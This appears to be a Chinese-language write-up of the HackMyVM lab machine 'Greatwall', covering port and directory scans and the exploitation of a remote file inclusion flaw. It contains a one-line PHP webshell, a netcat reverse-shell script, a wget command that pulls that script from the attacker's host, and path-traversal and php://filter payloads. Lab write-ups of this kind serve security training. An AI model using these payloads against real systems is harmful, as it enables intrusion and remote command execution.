{"id":891,"date":"2025-06-19T01:03:57","date_gmt":"2025-06-18T17:03:57","guid":{"rendered":"http:\/\/162.14.82.114\/?p=891"},"modified":"2025-06-19T01:03:57","modified_gmt":"2025-06-18T17:03:57","slug":"hmv-_-greatwall","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/891\/06\/19\/2025\/","title":{"rendered":"hmv[-_-]Greatwall"},"content":{"rendered":"

Greatwall<\/h1>\n

\"image-20250617231952169\"<\/div>
\n
\"image-20250618075004317\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ nmap -sT -T4 -sC -sV $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-17 19:52 EDT\nNmap scan report for 192.168.10.129\nHost is up (0.00099s latency).\nNot shown: 998 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:8c:5a:5a:8b:43:a1:27:81:13:ff:b6:be:b5:c6:e5 (ECDSA)\n|_  256 e4:73:84:da:df:18:e2:f2:db:5e:11:93:b5:d9:54:74 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.62 ((Debian))\n|_http-title: Hello World\n|_http-server-header: Apache\/2.4.62 (Debian)\nMAC Address: 00:0C:29:A5:9B:0B (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 28.84 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ dirsearch -u http:\/\/192.168.10.129\/ 2>\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )                                                                                                                                                                                 \nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/Greatwall\/reports\/http_192.168.10.129\/__25-06-17_20-02-58.txt\n\nTarget: http:\/\/192.168.10.129\/\n\n[20:02:58] Starting:                                                                                                                                                                                    \n[20:02:59] 403 -  279B  - \/.ht_wsr.txt                                      \n[20:02:59] 403 -  279B  - \/.htaccess.orig                                   \n[20:02:59] 403 -  279B  - \/.htaccess.sample\n[20:02:59] 403 -  279B  - \/.htaccess.save\n[20:02:59] 403 -  279B  - \/.htaccess_extra                                  \n[20:02:59] 403 -  279B  - \/.htaccess_sc                                     \n[20:02:59] 403 -  279B  - \/.htaccess.bak1                                   \n[20:02:59] 403 -  279B  - \/.htaccessBAK\n[20:02:59] 403 -  279B  - \/.htaccess_orig\n[20:02:59] 403 -  279B  - \/.htaccessOLD\n[20:02:59] 403 -  279B  - \/.htaccessOLD2\n[20:03:00] 403 -  279B  - \/.htm                                             \n[20:03:00] 403 -  279B  - \/.html                                            \n[20:03:00] 403 -  279B  - \/.htpasswd_test                                   \n[20:03:00] 403 -  279B  - \/.htpasswds\n[20:03:00] 403 -  279B  - \/.httr-oauth\n[20:03:00] 403 -  279B  - \/.php                                             \n[20:03:11] 404 -   16B  - \/composer.phar                                    \n[20:03:22] 404 -   16B  - \/php-cs-fixer.phar                                \n[20:03:23] 404 -   16B  - \/phpunit.phar                                     \n[20:03:26] 403 -  279B  - \/server-status                                    \n[20:03:26] 403 -  279B  - \/server-status\/\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.10.129\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.129\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 3193]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/.php                 (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20250618080024126\"<\/div><\/p>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n
\"image-20250618080049456\"<\/div><\/p>\n
\u53ef\u4ee5\u770b\u5230\u662fGET<\/code>\u4f20\u53c2\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/192.168.10.129\/?page=https%3A%2F%2Fwww.baidu.com<\/code><\/pre>\n
RFI(\u8bd5\u9519)<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u672c\u5730\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.129\/?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd" | html2text\nAcross the Great Wall we can reach every corner in the world\n[page                ]\nnonono~\n<\/code><\/pre>\n
\u53ef\u80fd\u6709\u8fc7\u6ee4\uff0c\u5c1d\u8bd5\u7f16\u7801\u5b57\u7b26\u518d\u5c1d\u8bd5\uff1a<\/p>\n
# php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n# php%3A%2F%2Ffilter%2Fconvert%2Ebase64%2Dencode%2Fresource%3D%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.129\/index.php?page=php%3A%2F%2Ffilter%2Fconvert%2Ebase64%2Dencode%2Fresource%3D%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd" | html2text\nAcross the Great Wall we can reach every corner in the world\n[page                ]\nnonono~<\/code><\/pre>\n
\u96be\u9053\u662fRFI\uff1f\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
# http:\/\/192.168.10.128:8888\/revshell.php\nhttp:\/\/192.168.10.129\/?page=http%3A%2F%2F192%2E168%2E10%2E128%3A8888%2Frevshell%2Ephp<\/code><\/pre>\n
\u7136\u540e\u5c31\u5f00\u59cb\u52a0\u8f7d\uff0c\u8fc7\u4e86\u4e00\u4f1a\u5e76\u672a\u53d1\u73b0shell\u6709\u8bf7\u6c42\u53d1\u8fc7\u6765\uff0c\u4e0b\u9762\u7684\u8bf7\u6c42\u662f\u6211\u4e3b\u673a\u8fdb\u884c\u6d4b\u8bd5\u7684\u7ed3\u679c\uff1a<\/p>\n
\"image-20250618081831592\"<\/div><\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u5b9a\u4f4d\u6587\u4ef6\uff1a<\/p>\n
\"image-20250618083130745\"<\/div><\/p>\n
http:\/\/192.168.10.129\/?page=http%3A%2F%2F127.0.0.1%2Findex.php<\/code><\/pre>\n
\"image-20250618090102104\"<\/div><\/p>\n
\u53d1\u73b0\u5e94\u8be5\u662f\u53ef\u4ee5\u5305\u542b\u672c\u5730\u6587\u4ef6\u5e76\u89e3\u6790\u7684\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\u6587\u4ef6\uff0c\u4f46\u662f\u5c31\u662f\u8bf7\u6c42\u4e0d\u5230\uff0c\u4e0d\u77e5\u9053\u5565\u60c5\u51b5\uff0c\u96be\u9053\u5141\u8bb8 put \u4e0a\u4f20\uff1f<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ rustscan -a 192.168.10.129 -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nYou miss 100% of the ports you don't scan. - RustScan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.129:22\nOpen 192.168.10.129:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:8c:5a:5a:8b:43:a1:27:81:13:ff:b6:be:b5:c6:e5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKRu5jciIdNNmfTqr0lMfefa78S29x6BomOO1L4LTfrFsfTOU1UWH6rMhYOO6\/lwUi6D16FBbDL7I3RciwoyX8w=\n|   256 e4:73:84:da:df:18:e2:f2:db:5e:11:93:b5:d9:54:74 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILXqxoPabwLw5VBYwTrRzVaoDU7Z1YHyzSNLVwV3v3xO\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.62 (Debian)\n|_http-title: Hello World\nMAC Address: 00:0C:29:A5:9B:0B (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u53d1\u73b0\u4e5f\u4e0d\u80fd\u8fdb\u884c put \u4e0a\u4f20\uff0c\u8fd8\u662f\u5f97\u5c1d\u8bd5\u8fdc\u7a0b\u5305\u542b\uff1a<\/p>\n
# http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128:8888\/shell.txt%00\nhttp:\/\/192.168.10.129\/?page=http%3A%2F%2F192%2E168%2E10%2E128%3A8888%2Fshell%2Etxt\n# nonono~\nhttp:\/\/192.168.10.129\/?page=http%253A%252F%252F192%252E168%252E10%252E128%253A8888%252Fshell%252Etxt\n# nonono~<\/code><\/pre>\n
\u90fd\u4e0d\u884c\uff0c\u7a81\u7136\u8ba9\u6211\u60f3\u8d77\u4e86boxing<\/code>\u90a3\u4e2a\u9776\u673a\uff0c\u5c1d\u8bd5\u4e00\u4e0bbasic\u8ba4\u8bc1\uff1a<\/p>\n
http:\/\/192.168.10.129\/?page=http:\/\/127.0.0.1:kali@192.168.10.128:8888\/revshell.php<\/code><\/pre>\n
\u4f46\u662f\u4e5f\u4e0d\u884c\u6b38\u3002\u3002\u3002\u3002\u7136\u540e\u5c31\u662f\u6162\u6162\u5c1d\u8bd5\uff0c\u76f4\u5230\u6211\u628a\u7aef\u53e3\u6539\u4e3a\u4e8680<\/code>.\u3002\u3002\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/shell.php<\/code><\/pre>\n
\"image-20250618102657838\"<\/div>
\n
\"image-20250618102639349\"<\/div><\/p>\n
\u5c1d\u8bd5\u672c\u5730\u5305\u542b\u8fdb\u884c\u53cd\u5f39\uff1a<\/p>\n
http:\/\/192.168.10.129\/?page=http:\/\/127.0.0.1\/shell.php<\/code><\/pre>\n
\u4f46\u662f\u53d1\u73b0\u4e0d\u884c\u6b38\u3002\u3002\u3002\u3002\u7814\u7a76\u4e0b\u62a5\u9519\uff1a<\/p>\n
WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)<\/code><\/pre>\n
\u5c1d\u8bd5\u5173\u95ed\u9632\u706b\u5899\u3002\u3002\u3002\u3002\u3002\u4f46\u662f\u4ecd\u7136\u4e0d\u884c\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u4fee\u6539\u6587\u4ef6\u540e\u7f00\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e5f\u4e0d\u884c\u3002\u3002\u3002\u3002<\/p>\n
\"image-20250618111720468\"<\/div>
\n
\"image-20250618111732718\"<\/div><\/p>\n
\u60f3\u8d77\u4e4b\u524d\u4e0d\u77e5\u9053\u662f\u9650\u5236\u4e86\u5f00\u653e\u7aef\u53e3\u8fd8\u662f\u957f\u5ea6\u5931\u8d25\u4e86\uff0c\u6240\u4ee5\u8fd9\u91cc\u6539\u4e3a\u4e00\u53e5\u8bddshell\u8bd5\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ cat webshell.php \n<?php system($_GET["cmd"]) ;?><\/code><\/pre>\n
\"image-20250618134757669\"<\/div>
\n
\"image-20250618134807084\"<\/div><\/p>\n
\u53d1\u73b0\u6ca1\u6709\u62a5\u9519\u4e86\uff0c\u4f46\u662f\u8fd8\u662f\u8bfb\u53d6\u4e0d\u5230\uff0c\u6539\u4e3aGIF89a<\/code>\u548c.jpg<\/code>\u540e\u7f00\u6709\u4e86\u65b0\u7684\u56de\u663e\uff1a<\/p>\n
\"image-20250618135855405\"<\/div><\/p>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u4e0a\u4f20\u6210\u529f\u4e86\uff1a<\/p>\n
\"image-20250618135938520\"<\/div><\/p>\n
\u6210\u529f\u6267\u884c\u547d\u4ee4\uff0c\u5c1d\u8bd5\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u53cd\u5f39shell\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ chmod +x revshell.sh \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ head revshell.sh \nnc -e \/bin\/bash 192.168.10.128 1234\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ls -la revshell.\nls: cannot access 'revshell.': No such file or directory\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ls -la revshell.sh \n-rwxrwxr-x 1 kali kali 36 Jun 18 02:11 revshell.sh\n\nhttp:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&cmd=wget http:\/\/192.168.10.128\/revshell.sh -O \/tmp\/revshell.sh\nhttp:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&cmd=ls -la \/tmp\/revshell.sh\n# -rw-r--r-- 1 www-data www-data 36 Jun 18 14:11 \/tmp\/revshell.sh\n# \u65e0\u6cd5\u4fee\u6539\u6743\u9650\u3002\u3002\u3002\u3002\u3002<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u6587\u4ef6\u5427\uff1a<\/p>\n
http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&cmd=cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\nwall:x:1000:1000:wall,,,:\/home\/wall:\/bin\/bash<\/code><\/pre>\n
\u8fd8\u662f\u8001\u8001\u5b9e\u5b9e\u770b\u6e90\u4ee3\u7801\u5427\uff1a<\/p>\n
http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&cmd=cat index.php<\/code><\/pre>\n
<?php\nif (isset($_GET['page'])) {\n$page = $_GET['page'];\n\nif (!preg_match('\/^(file|https?):\\\/\\\/\/i', $page)) {\necho 'nonono~';\nreturn;\n}\n\nif (preg_match('\/^https?:\\\/\\\/(www\\.)?google\\.com\\\/?$\/i', $page)) {\necho 'gulugulu~';\nreturn;\n}\n\n@include($page);\n}\n?><\/code><\/pre>\n